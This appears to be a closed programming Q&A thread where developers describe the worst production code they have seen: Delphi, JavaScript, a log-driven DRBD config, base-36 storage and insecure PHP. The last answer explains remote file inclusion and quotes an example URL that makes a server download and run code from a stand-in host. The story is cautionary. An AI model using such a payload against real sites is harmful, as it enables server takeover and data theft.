What is the most EVIL code you have ever seen in a production enterprise environment? [closed]

Answer 1

Really evil was this piece of brilliant delphi code:

type
  TMyClass = class
  private
    FField : Integer;
  public
    procedure DoSomething;
  end;

var
  myclass : TMyClass;


procedure TMyClass.DoSomething;
begin
  myclass.FField := xxx; // 
end;

It worked great if there was only one instance of a class. But unfortunately I had to use an other instance and that created lots of interesting bugs.

When I found this jewel, I can't remember if I fainted or screamed, probably both.

Answer 2

I saw code in an ASP.NET MVC site from a guy who had only done web forms before (and is a renowned copy/paster!) that stuck a client side click event on an <a> tag that called a javascript method that did a document.location.

I tried to explain that a href on the <a> tag would do the same!!!

Answer 3

The Windows installer.

Answer 4

I had the deep misfortune of being involved in finding a rather insane behavior in a semi-custom database high-availability solution.

The core bits were unremarkable. Red Hat Enterprise Linux, MySQL, DRBD, and the Linux-HA stuff. The configuration, however, was maintained by a completely custom puppet-like system (unsurprisingly, there are many other examples of insanity resulting from this system).

It turns out that the system was checking the install.log file that Kickstart leaves in the root directory for part of the information it needed to create the DRBD configuration. This in itself is evil, of course. You don't pull configuration from a log file whose format is not actually defined. It gets worse, though.

It didn't store this data anywhere else, and every time it ran, which was every 60 seconds, it consulted install.log.

I'll just let you guess what happened the first time somebody decided to delete this otherwise useless log file.

Answer 5

Base 36 encoding to store ints in strings.

I guess the theory goes somewhat along the lines of:

• Hexadecimal is used to represent numbers
• Hexadecimal doesnt use letters beyond F, meaning G-Z are wasted
• Waste is bad

At this moment I am working with a database that is storing the days of the week that an event can happen on as a 7-bit bitfield (0-127), stored in the database as a 2-character string ranging from '0' to '3J'.

Answer 6

Combination of all of the following Php 'Features' at once.

1. Register Globals
2. Variable Variables
3. Inclusion of remote files and code via include("http:// ... ");

4. Really Horrific Array/Variable names ( Literal example ):

   foreach( $variablesarry as $variablearry ){
     include( $$variablearry ); 
   }
   

   ( I literally spent an hour trying to work out how that worked before I realised they wern't the same variable )

5. Include 50 files, which each include 50 files, and stuff is performed linearly/procedurally across all 50 files in conditional and unpredictable ways.

For those who don't know variable variables:

$x = "hello"; 
$$x = "world"; 
print $hello # "world" ;

Now consider $x contains a value from your URL ( register globals magic ), so nowhere in your code is it obvious what variable your working with becuase its all determined by the url.

Now consider what happens when the contents of that variable can be a url specified by the websites user. Yes, this may not make sense to you, but it creates a variable named that url, ie:

$http://google.com,

except it cant be directly accessed, you have to use it via the double $ technique above.

Additionally, when its possible for a user to specify a variable on the URL which indicates which file to include, there are nasty tricks like

http://foo.bar.com/baz.php?include=http://evil.org/evilcode.php

and if that variable turns up in include($include)

and 'evilcode.php' prints its code plaintext, and Php is inappropriately secured, php will just trundle off, download evilcode.php, and execute it as the user of the web-server.

The web-sever will give it all its permissions etc, permiting shell calls, downloading arbitrary binaries and running them, etc etc, until eventually you wonder why you have a box running out of disk space, and one dir has 8GB of pirated movies with italian dubbing, being shared on IRC via a bot.

I'm just thankful I discovered that atrocity before the script running the attack decided to do something really dangerous like harvest extremely confidential information from the more or less unsecured database :|

( I could entertain the dailywtf every day for 6 months with that codebase, I kid you not. Its just a shame I discovered the dailywtf after I escaped that code )